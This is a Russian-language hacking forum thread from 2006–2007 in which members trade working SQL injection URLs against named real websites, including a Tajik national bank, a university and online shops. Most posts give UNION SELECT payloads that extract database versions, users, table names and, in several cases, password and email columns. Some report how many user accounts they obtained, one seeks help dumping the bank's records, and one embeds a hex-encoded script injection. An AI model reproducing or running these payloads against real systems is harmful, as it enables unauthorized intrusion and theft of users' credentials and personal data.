SQL Инъекции

Discussion in 'Уязвимости' started by m0nzt3r, 4 Jul 2006.

Thread Status:
Not open for further replies.
  1. fYt

    fYt Elder - Старейшина

    Joined:
    11 Jan 2007
    Messages:
    54
    Likes Received:
    36
    Reputations:
    7
    http://www.allaboutjazz.com/php/news.php?id=86311+union+select+1,2,USER(),VERSION(),5,DATABASE(),7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27/*
    Нашел таблицу contact, может кто дальше зайдет.
     
    1 person likes this.
  2. Digimortal

    Digimortal Banned

    Joined:
    22 Aug 2006
    Messages:
    471
    Likes Received:
    248
    Reputations:
    189
    Code:
    http://www.emotive.ru/shop/index.php?CID=-1+union+select+1,concat(version(),char(58),user(),char(58),database())--
    Code:
    http://www.yuretz.ru/prikol.php?id=471+and+version()%3E4
    Code:
    http://www.temporeal.com.br/produtos.php?id=-1/**/union/**/select/**/1,2,3,4,5,6,user(),version(),9,10,11,12,13,14,16,17,18,19,database(),21,22,23,24,25,26,27,28,29,30,31,32,33/*
     
  3. banned

    banned Banned

    Joined:
    20 Nov 2006
    Messages:
    3,324
    Likes Received:
    1,193
    Reputations:
    252
    GisMeteo.ru
    Code:
    http://avia.gismeteo.ru/avia.php?id=-27612+union+select+1,2,3,4,5,6,concat(convert(database()+using+cp1251),convert(char(59)+using+cp1251),convert(user()+using+cp1251),convert(char(59)+using+cp1251),convert(version()+using+cp1251))/*
     
  4. Spyder

    Spyder Elder - Старейшина

    Joined:
    9 Oct 2006
    Messages:
    1,388
    Likes Received:
    1,209
    Reputations:
    475
    http://www.allaboutjazz.com
    Уже раз 10 постят
     
    #1864 Spyder, 13 Apr 2007
    Last edited: 13 Apr 2007
    2 people like this.
  5. kamaz

    kamaz Elder - Старейшина

    Joined:
    31 Jan 2007
    Messages:
    151
    Likes Received:
    275
    Reputations:
    280
    __:)__
     
  6. Spyder

    Spyder Elder - Старейшина

    Joined:
    9 Oct 2006
    Messages:
    1,388
    Likes Received:
    1,209
    Reputations:
    475
    ShadOS, и где эти правила?
     
  7. zl0ba

    zl0ba ПсихолоГ

    Joined:
    10 Oct 2006
    Messages:
    393
    Likes Received:
    301
    Reputations:
    52
    http://www.recordkicks.com/uk/news_detail.php?idnew=-143+union+select+1,2,passw,4,5,6,7+from+admin/*

    Не смог подобрать колонку с логином
     
    3 people like this.
  8. Constantine

    Constantine Elder - Старейшина

    Joined:
    24 Nov 2006
    Messages:
    798
    Likes Received:
    710
    Reputations:
    301
    //
    Code:
    http://mkp.emokykla.lt/etnine3/1.php?id=12&level=null+union+select+1,2,concat(user(),char(59),version()),4/*
     
  9. V.I.P

    V.I.P Elder - Старейшина

    Joined:
    6 Apr 2007
    Messages:
    69
    Likes Received:
    45
    Reputations:
    -6
    http://www.sitronics.ru/?item_id=-118+union+select+1,version( )/*-в самом низу
    http://www.seredina.ru/index.php?id=1&city_id=-19+union+select+version( )/*
    http://www.paritetk.ru/links.php?part_id=-50+order+by+2 5/*
    http://www.crocus-expo.ru/news/?id=-127+order+by+1 0/*
     
    1 person likes this.
  10. kair

    kair Elder - Старейшина

    Joined:
    12 Oct 2006
    Messages:
    146
    Likes Received:
    83
    Reputations:
    -4
    Уральский государственный экономический университет
    http://www.usue.ru/general/professors/?id=50%20union%20select%201,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18/*
     
    1 person likes this.
  11. *D1VER

    *D1VER Elder - Старейшина

    Joined:
    5 Dec 2006
    Messages:
    108
    Likes Received:
    67
    Reputations:
    21
    http://www.fasie.ru/index.php?pid=-1+union+select+1,0x3c7363726970743e616c65727428272a443156455227293c2f7363726970743e,3,4,5/*
    http://www.newdramafest.ru/news.php?nid=-1+union+select+1,2,user(),444/*
    http://www.dynamomania.com/news.php?p=message&id=-1+union+select+concat(email,char(58),id,char(58),pwd,char(58))+from+users/* Вывод в Титле! Пасы к форуму! Форум шляпный ((
    http://www.informeco.ru/sud.php?stat=-1+union+select+1,2,table_name,4,5,6,7,8,9,10+from+information_schema.tables/*
     
    #1871 *D1VER, 13 Apr 2007
    Last edited: 13 Apr 2007
  12. V.I.P

    V.I.P Elder - Старейшина

    Joined:
    6 Apr 2007
    Messages:
    69
    Likes Received:
    45
    Reputations:
    -6
    http://www.fotocopy.ru/catalog/showcd.html?id=1339'
    http://www.skripov.com/index.php?date=2007-02-15&page=12&item_id=157640'
    http://www.infosystems.ru/TestCenter/order.asp?TestID=5839'
    http://www.azs-snab.ru/answer_board.php?id=13977'
    ---------------------------------------------------
    http://www.crdf.ru/?id=-20+order+by+9/*
    ---------------------------------------------------
    http://archive.officemart.ru/news_print.htm?id=1417'+union+select+1,2,3,4,5+from+email/*
    http://www.heartsunion.com/vopr-otv/index.php?id=-8+union+select+1,2,3,version(),4/*
     
    1 person likes this.
  13. *D1VER

    *D1VER Elder - Старейшина

    Joined:
    5 Dec 2006
    Messages:
    108
    Likes Received:
    67
    Reputations:
    21

    Одна инъекциЯ
    Остальное Шняга какаято...
     
    1 person likes this.
  14. -ter-

    -ter- New Member

    Joined:
    23 Aug 2005
    Messages:
    4
    Likes Received:
    0
    Reputations:
    0
    http://sibron.ru/index.php?option=com_content&id=0&Itemid=0&task=section
    выдает ошибку:
    Fatal error: Call to undefined method: mosempty->set() in /var/optpart/local/apache/http/sibron.ru/ht docs/components/com_content/content.php on line 197
    но если поставить кавычку в конце - всё ок
    в чем может быть дело?
    движок mambo имхо > 4.5
    посоветуйте что нить плз!
     
    #1874 -ter-, 13 Apr 2007
    Last edited by a moderator: 14 Apr 2007
  15. *D1VER

    *D1VER Elder - Старейшина

    Joined:
    5 Dec 2006
    Messages:
    108
    Likes Received:
    67
    Reputations:
    21
    http://www.metalistfans.net/news.php?id=-1+union+select+1,2,3,4,name,6,7,8,9+from+forum/*
    http://www.ezgulik.org/news.php?id=-197+union+select+1,2,version(),user(),5,6/*
     
    #1875 *D1VER, 13 Apr 2007
    Last edited: 13 Apr 2007
  16. Серенький

    Joined:
    13 Apr 2007
    Messages:
    112
    Likes Received:
    145
    Reputations:
    83
    sql-inj

    Сайт: http://flash-gorod.net/
    уязвимость: http://flash-gorod.net/files.php?cat=4'
    подобранные таблицы: users
    подобранные поля: nick,password,icq,email,city,sex
    767 организмов
     
    1 person likes this.
  17. kair

    kair Elder - Старейшина

    Joined:
    12 Oct 2006
    Messages:
    146
    Likes Received:
    83
    Reputations:
    -4
    попалась скуль в банке таджикистана =)
    помогите вывести записи!!!
    http://www.nbt.tj/?c=5&id=5%20union%20select%201,2,3,4,5,6,7,8,9/*
     
  18. V.I.P

    V.I.P Elder - Старейшина

    Joined:
    6 Apr 2007
    Messages:
    69
    Likes Received:
    45
    Reputations:
    -6
    sorry глюканул чё та я.

    http://www.akvilon.biz/index.php?content=products&prd_id=-48+union+select+1,2,3, 4/*
    Таблицы:
    CHARACTER_SETS, COLLATIONS, COLLATION_CHARACTER_SET_APPLICABILITY, COLUMNS, COLUMN_PRIVILEGES, KEY_COLUMN_USAGE, ROUTINES, SCHEMATA, SCHEMA_PRIVILEGES, STATISTICS, TABLES, TABLE_CONSTRAINTS, TABLE_PRIVILEGES, TRIGGERS, USER_PRIVILEGES, VIEWS, banners, categories, images, news, newspics, partners, prices, product_docs, products, sertificates
    ---------------------------
    http://www.uprav.biz/show_action.php?action_id=14762'+union+select+1,2,3,4,5,6,7,8,9,10,1,2,3,4,5,6,7,8,9,10,1,2,3,4,5,6,7,8,9,10,1,2,3,4,5,6,7,8,9/* -слепая инж order49
     
    #1878 V.I.P, 13 Apr 2007
    Last edited by a moderator: 13 Apr 2007
  19. Серенький

    Joined:
    13 Apr 2007
    Messages:
    112
    Likes Received:
    145
    Reputations:
    83
    sql-inj

    Сайт: http://inetoncd.ru/
    уязвимость: http://inetoncd.ru/catalog_order.php?hash=211638&mom=76'
    подобранные таблицы: clients
    подобранные поля: id,login,password
    3392 организма
     
    1 person likes this.
  20. }{0TT@БЬ)Ч

    }{0TT@БЬ)Ч Elder - Старейшина

    Joined:
    20 Jan 2006
    Messages:
    269
    Likes Received:
    140
    Reputations:
    31
    Code:
    http://www.nbt.tj/?c=44&id=44&a=-289+union+select+1,AES_DECRYPT(AES_ENCRYPT(database(),0x71),0x71),3,4,5/*
    но таблиц чето не нашел :(
     
    2 people like this.
Thread Status:
Not open for further replies.